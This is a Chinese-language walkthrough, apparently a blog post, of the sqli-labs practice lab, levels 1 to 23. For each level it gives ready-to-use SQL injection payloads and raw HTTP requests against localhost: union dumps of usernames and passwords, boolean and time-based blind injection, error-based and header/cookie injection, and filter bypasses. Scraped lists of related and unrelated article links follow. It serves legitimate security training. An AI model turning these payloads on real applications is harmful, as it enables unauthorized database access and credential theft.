Less-1

  payload:'+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+

  第一关正规的字符型SQL注入,单引号报错,常规注入即可

Less-2

   payload:+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+

  第二关数字型SQL注入,直接跟payload即可,通过and 1=1 ,and 1=2发现注入点

Less-3

  payload:')+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+

  第三关为小括号包裹的字符型注入,发现注入点之后使用payload即可

Less-4

  payload:")+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+

  第四关为小括号包裹的字符型注入

Less-5

  payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+

  payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+

  布尔盲注脚本:https://www.cnblogs.com/Spec/p/10648793.html

  此脚本只将数据库爆出,具体还需要自己更改。

Less-6

  payload1(探测长度,以database()为例):"+and+(select+length(database())=8)--+

  payload2(探测内容,以database()为例):"+and+(select+mid(database(),1,1)='s')--+

  同第五关,脚本稍作更改也可使用

Less-7

  payload1(探测长度,以database()为例):'))+and+if((length(database())=8),sleep(3),1)--+

  payload2(探测内容,以database()为例):'))+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

  时间盲注,通过if语句判断,争取则延时3秒,否则不延时。

Less-8

  payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+

  payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+

  同第五关

Less-9

  payload1(探测长度,以database()为例):'+and+if((length(database())=8),sleep(3),1)--+

  payload2(探测内容,以database()为例):'+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

  同第七关,单引号字符型延时盲注

Less-10

  payload1(探测长度,以database()为例):"+and+if((length(database())=8),sleep(3),1)--+

  payload2(探测内容,以database()为例):"+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

Less-11

  payload:

POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

  常规的post注入,万能密码等。

Less-12

  payload:

POST /sqli-labs/Less-12/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-12/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110 uname=admin&passwd=123") and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

Less-13

  poc:

POST /sqli-labs/Less-13/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-13/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74 uname=admin&passwd=123') or (select length(database())=8)-- &submit=Submit

  post类型的布尔盲注,密码处通过 or 来判断真假

Less-14

  poc:

POST /sqli-labs/Less-14/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-14/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67 uname=1&passwd=1" or (select length(database())=8)-- &submit=Submit

  同第十三关

Less-15

  payload:

POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

Less-16

  poc:

POST /sqli-labs/Less-16/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-16/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74 uname=admin&passwd=123") or (select length(database())=8)-- &submit=Submit

Less-17

  poc:

POST /sqli-labs/Less-17/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-17/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100 uname=secure&passwd=admin' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- &submit=Submit

  报错注入,之前一直用这个payload:

select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a

  但一直都不对,知道读源码才知道对长度进行了限制,所以使用这个payload:

updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

  发现报错成功。

Less-18

  poc:

POST /sqli-labs/Less-18/ HTTP/1.1
Host: localhost
User-Agent: ' or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) or '
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-18/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34 uname=admin&passwd=0&submit=Submit

  看源码发现,是将User-Agent未过滤插入数据库中,此时构造报错注入:updatexml(1,concat(0x7e,(SELECT user()),0x7e),1),从而产生sql  http头注入。

Less-19

  poc:

POST /sqli-labs/Less-19/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or '
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34 uname=admin&passwd=0&submit=Submit

  同第十八关一样,不过登录进去时发现会将referer输出,于是修改referer的值,报错成功。

Less-20

  poc:

GET /sqli-labs/Less-20/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=admin' and 1=2 union select user(),version(),database()--+
Connection: close

  cookie注入,当登录进去时,发现会将User-Anget,referer,cookie输出到页面中,然后刷新,抓包,替换cookie为payload即可。

Less-21

  poc:

GET /sqli-labs/Less-21/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxIw==
Connection: close

  payload使用base64编码,并且注入点使用单引号和小括号包裹 ')

  payload: admin') and 1=2 union select 1,username,password from security.users limit 0,1#

Less-22

  poc:

GET /sqli-labs/Less-22/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEsdXNlcm5hbWUscGFzc3dvcmQgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAwLDEtLSA=
Connection: close

  payload:admin" and 1=2 union select 1,username,password from security.users limit 0,1--

Less-23

  payload: ' and '1'='2' union select '1',username,password from security.users limit 0,1;%00

  多次尝试基本确定 # 与 -- 是被过滤掉了的,于是尝试新的注释方法: ;%00 于是注释成功。

sqli-labs Less-1~~~Less-23的更多相关文章

  1. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  2. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  3. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  4. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  5. SQL注入系列:SQLi Labs

    前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...

  6. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  7. SQLI LABS Challenges Part(54-65) WriteUp

    终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...

  8. SQLI LABS Stacked Part(38-53) WriteUp

    这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...

  9. SQLI LABS Advanced Part(23-37) WriteUp

    继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...

  10. Sqli labs系列-less-5&6 报错注入法(下)

    我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...

随机推荐

  1. 通过Camtasia来制作画中画视频效果的方法

    随着全民娱乐化的发展,视频的形式也更加多种多样了.视频形式的多样化能让观众从不同形式的视频中观赏到更有趣味的内容.比如像画中画的视频形式,让视频中的人物看起来像与观众一同观看视频,或者形成两个视频的对 ...

  2. 【Python】python 入门与进阶

    github地址:https://github.com/wangxiao9/basic_python.git

  3. Codeforces Round #660 (Div. 2) A、B、C题解

    A. Captain Flint and Crew Recruitment #构造 题目链接 题意 定义一类正整数,能够被\(p*q\)表示,其中\(p.q(1<p<q)\)均为素数,称之 ...

  4. dubbo 远程调用

    记得服务暴露的时候createServer()里 server = Exchangers.bind(url, requestHandler); requestHandler在DubboProtocol ...

  5. Kafka分布式查询引擎

    1.概述 Kafka是一个分布式消息中间件系统,里面存储着实际场景中的数据.Kafka原生是不支持点查询的,如果我们想对存储在Topic中的数据进行查询,可能需要对Topic中的数据进行消费落地,然后 ...

  6. Django 在test.py 中测试文件的配置

    import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTING ...

  7. 微服务架构下 CI/CD 如何落地

    本文系云原生应用最佳实践杭州站活动演讲稿整理.杭州站活动邀请了 Apache APISIX 项目 VP 温铭.又拍云平台开发部高级工程师莫红波.蚂蚁金服技术专家王发康.有赞中间件开发工程师张超,分享云 ...

  8. 为什么SimpleDateFormat不是线程安全的?

    一.前言 日期的转换与格式化在项目中应该是比较常用的了,最近同事小刚出去面试实在是没想到被 SimpleDateFormat 给摆了一道... 面试官:项目中的日期转换怎么用的?SimpleDateF ...

  9. Spring Cloud 学习 (三) Feign

    新建 spring-cloud-eureka-feign-client Module pom <parent> <artifactId>spring-cloud-parent& ...

  10. no Qt platform plugin could be initialized问题的解决办法

    ☞ ░ 前往老猿Python博文目录 ░ 今天因要使用到一个以前PyQT写得工具,但运行时报错: This application failed to start because no Qt plat ...